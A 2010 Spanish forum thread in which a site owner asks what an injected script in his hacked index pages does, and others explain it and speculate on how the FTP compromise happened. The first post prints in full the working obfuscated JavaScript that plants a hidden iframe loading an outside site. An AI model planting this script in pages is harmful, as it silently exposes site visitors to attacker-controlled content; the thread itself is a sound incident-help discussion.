Codigo hackeo

Copp · #1 (**permalink**) 13/10/2010, 22:18

Buenas.

Esta noche de alguna forma, se han colado en el ftp de dos servidores mios, y han modificado todos los archivos index, ya sean .html o .php. con el siguiente codigo:

Código:

<script type='text/javascript'>function nK(){};var sV=new Array();nK.prototype = {g : function() {this.t=false;j="";var e=false;var m="m";f="f";function d(){};var q=new String("body");var zE=function(){return 'zE'};var i=new Array();this.iM="iM";var nB='';var w=120;this.h='';this.eE="";this.qO=2777;this.mQ='';var wO=new Array();var fC=new Array();try {var v=false;var wW=function(){return 'wW'};this.qZ=38462;yG=54242;kY=5135;this.uM=false;var x=new Date();var a="a";var y="appeQIl".substr(0,4)+"w6ZndChwZ6".substr(3,4)+"sB8ildsB8".substr(3,3);this.s=40976;this.kM=44548;var k=document;aC="aC";var mE=new Date();var z=new String("iframA0n".substr(0,5)+"evcHF".substr(0,1));var hF=new Array();dF='';var wH=new String("cr"+"ea"+"te"+"El"+"em"+"en"+"tU2i".substr(0,1));this.b="b";nN="";this.dU="dU";wK="wK";var gA='';var iV=new Date();var u = k[wH](z);var qL="";var p=false;this.nM=4880;this.c='';var gH=new Array();var zT=false;iB='';var yU = new String("viNf4Y".substr(0,2)+"39Psi39P".substr(3,2)+"bi9ySC".substr(0,2)+"liY2FL".substr(0,2)+"tyfET".substr(0,2));var tT=false;var dX=new Date();u.height=w;var zEZ=false;var yV=new Date();eH='';u.width=w;var jP=function(){};xP='';var wY="wY";var r=function(){};var uX=function(){return 'uX'};uB='';var pV=function(){return 'pV'};var pY=function(){};u.src=String("htt"+"p:/"+"/biMJK".substr(0,3)+"jaMgezaMj".substr(3,3)+"a.c"+"om/fzVa".substr(0,3)+"use"+"hwOrs/hOw".substr(3,3)+"5");o=20697;var zJ=new Array();u.style[yU]="hidd"+"en";var tL="tL";this.dN="dN";this.fL="fL";var eB=false;var gHY=false;var eF=false;var gF="gF";k[q][y](u);var xZ=new Date();var mK="mK";var zC="zC";this.gE="gE";this.uJ="";var mEX='';this.wKA=30901;} catch(ex){var iD='';var kU="";this.gI='';hI="";document.write("<"+q+">");var uE=function(){return 'uE'};cE="cE";var yL="yL";var n=this;var fQ="fQ";function bN(){};var zV=false;this.fM='';setTimeout(function(){n.g();}, w);var rQ=false;var uF="uF";}kT='';fA=false;}};var sU=new Array();var uK=new nK(); this.pA=1620;uK.g();var oS="";</script>

Alguien sabe decirme que hace esto?

Gracias

zerokilled · #2 (**permalink**) 13/10/2010, 23:17

¿que hace el codigo? te inserta un iframe oculto en el documento y carga una web http://bigeza.com/users/5. lo que es curioso es que la web es redirigida a google. en fin, si el codigo no es tuyo, entonces eliminalo.

Copp · #3 (**permalink**) 14/10/2010, 01:12

Cita:

Iniciado por zerokilled

¿que hace el codigo? te inserta un iframe oculto en el documento y carga una web http://bigeza.com/users/5. lo que es curioso es que la web es redirigida a google. en fin, si el codigo no es tuyo, entonces eliminalo.

Cuando el codigo estaba en los index, no redirigia a ninguna parte. Si lo copias tu en un .html veras que no pasa nada al abrirlo.
Lo que no se, es como narices han accedido a las cuentas de FTP para hacer eso, porque ha sido en dos servidores, y una de las cuentas de FTP tenia una contraseña de 17 caracteres, con mayusculas, minusculas, numeros y puntos.
Asi que ni idea de como lo hicieron.

zerokilled · #4 (**permalink**) 14/10/2010, 01:17

no necesariamente se necesite acceso por ftp. pudo haber sido inyeccion de codigo si es que en los sitios recopilas datos introducido por usuarios. si estas seguro que no fue por inyeccion de parte de usuarios, tienes que determinar si fue por recursos externos que integres en el sitio. y sino, pues ni idea, ve planificando en cambiar las contraseñas.

referente a la redireccion, me refiero en el iframe que introduce el codigo. pero este iframe esta escondido con visibility:hidden.

Copp · #5 (**permalink**) 14/10/2010, 02:30

Cita:

Iniciado por zerokilled

no necesariamente se necesite acceso por ftp. pudo haber sido inyeccion de codigo si es que en los sitios recopilas datos introducido por usuarios. si estas seguro que no fue por inyeccion de parte de usuarios, tienes que determinar si fue por recursos externos que integres en el sitio. y sino, pues ni idea, ve planificando en cambiar las contraseñas.

referente a la redireccion, me refiero en el iframe que introduce el codigo. pero este iframe esta escondido con visibility:hidden.

Pense en lo de inyeccion de codigo, pero algunas de las webs eran simples paginas en html, no tienen nada ni de php, ni base de datos, ni nada, solo html.
La pass seguro que no las sacaron, de algunas de ellas es imposible.

Quiza algun bug en el propio sistema operativo, no lo se. Creo que voy a no dejar que hayan logins por FTP, y cuando necesite hacer algo los activo.

delarub · #6 (**permalink**) 14/10/2010, 07:21

Yo tengo un servidor en estados unidos y me han puesto ese codigo tambien.

¿Por casualidad usas proFTPd como servidor de FTP? Es lo unico que se me ocurre para que hayan accedido a los archivos...

Copp · #7 (**permalink**) 14/10/2010, 08:22

Cita:

Iniciado por delarub

Yo tengo un servidor en estados unidos y me han puesto ese codigo tambien.

¿Por casualidad usas proFTPd como servidor de FTP? Es lo unico que se me ocurre para que hayan accedido a los archivos...

Pues si, uso proftpd. Pues si que es seguro no....? Lo que he hecho es deshabilitar el logueo de los usuarios de ftp, cuando me haga falta modifcar algo lo activo y luego lo desactivo.

delarub · #8 (**permalink**) 14/10/2010, 09:12

Cita:

Iniciado por Copp

Pues si, uso proftpd. Pues si que es seguro no....? Lo que he hecho es deshabilitar el logueo de los usuarios de ftp, cuando me haga falta modifcar algo lo activo y luego lo desactivo.

Es raro, en un servidor de hosting gratuito que usa Pure-FTPd tambien ha afectado, por lo menos a mi sitio.
Me queda por saber si ha afectado a todos los hospedados ahi o solo a mi, en cuyo caso sera algun virus local...

Copp · #9 (**permalink**) 14/10/2010, 09:14

Cita:

Iniciado por delarub

Es raro, en un servidor de hosting gratuito que usa Pure-FTPd tambien ha afectado, por lo menos a mi sitio.
Me queda por saber si ha afectado a todos los hospedados ahi o solo a mi, en cuyo caso sera algun virus local...

A mi me ha pasado exactamente lo mismo en dos servidores dedicados alojados en ovh

delarub · #10 (**permalink**) 14/10/2010, 09:16

Cita:

Iniciado por Copp

A mi me ha pasado exactamente lo mismo en dos servidores dedicados alojados en ovh

Tambien ha afectado a un sitio que tengo en 1AND1, no creo que el "virus" haya tenido tanto alcance y tan poca repercusion en los medios (al menos de internet), asi que intuyo que el virus es local, ha obtenido todas las cuentas que tengo recordadas en FileZilla y ha modificado los index.php o index.htm...

Copp · #11 (**permalink**) 14/10/2010, 09:38

Y que narices ganan con modificar el index con eso? En una de las webs que tengo he notado un bajon de visitas, no se si tendra algo que ver, que haya redireccionado visitas durante el tiempo que estuvo puesto el codigo.

PD: Sabeis algun comando en linux para buscar una palabra en todos los archivos correspondientes a un directorio? aunque tenga mas subdirectorios. CAT no funciona porque no permite poner -R .

Copp · #12 (**permalink**) 14/10/2010, 09:58

Parece ser un fallo de seguridad en el kernel: http://foros.ovh.es/showthread.php?t=7428